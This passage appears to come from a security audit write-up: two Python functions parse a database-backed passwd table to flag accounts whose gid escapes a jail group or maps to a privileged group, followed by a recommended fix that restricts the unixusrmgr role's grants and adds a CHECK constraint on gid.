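def parse_passwd_table(text: str) -> List[PasswdRow]:
    """Parse pipe-separated passwd_table rows as psql prints them."""
    rows: List[PasswdRow] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        cols = [c.strip() for c in line.split("|")]
        username, _hash, uid, gid, _gecos, homedir, shell = cols
        rows.append(PasswdRow(username, int(uid), int(gid), homedir, shell))
    return rows


def find_privileged_rows(passwd_text: str, group_text: str) -> List[Tuple[str, int, str]]:
    """Return (username, gid, group name) for every DB-backed account whose
    primary gid is not the jail gid or resolves to a privileged group."""
    gid_to_name = parse_etc_group(group_text)
    findings = []
    for row in parse_passwd_table(passwd_text):
        gname = gid_to_name.get(row.gid, "?")
        if row.gid != JAIL_GID or gname in PRIVILEGED_GROUPS:
            findings.append((row.username, row.gid, gname))
    return findings
```

The underlying fix is on the database side: the unixusrmgr role only needs INSERT and DELETE on passwd_table for the portal's add/remove actions, so UPDATE on the gid column should not be granted, and a CHECK constraint pinning gid to 1001 would stop the change even if it were.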